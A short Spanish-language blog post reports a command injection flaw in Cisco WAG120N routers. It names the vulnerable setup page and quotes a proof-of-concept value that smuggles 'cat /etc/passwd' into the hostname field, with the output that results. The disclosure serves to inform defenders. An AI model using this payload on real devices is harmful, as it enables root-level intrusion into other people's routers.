Vulnerabilidad Remote Command Execution en los routers Cisco WAG120N

Se ha descubierto una vulnerabilidad en los routers modelo WAG120N de Cisco que permite la ejecución de comandos remotos. Esta vulnerabilidad permite practicamente tomar control remoto sobre el dispositivo. La vulnerabilidad ha sido reportada Manuel Fernández en una lista de correos de seguridad.

Cisco WAG120N

Cisco WAG120N

Para explotar la vulnerabilidad debemos autentificarnos e ingresar a /setup.cgi?next_file=Setup_DDNS.htm. Todos los campos que se ven en esa página son vulnerables a ejecución de comandos remotos como usuario root.

Por ejemplo, la prueba de concepto que publica Manuel, inyecta el comando «cat /etc/passwd» en el campo hostname, de la siguiente forma:

qwe.com;cat /etc/passwd> /www/Routercfg.cfg;

Obteniendo el resultado esperado:

root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh

Manuel indica que no lo ha probado en otros modelos.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.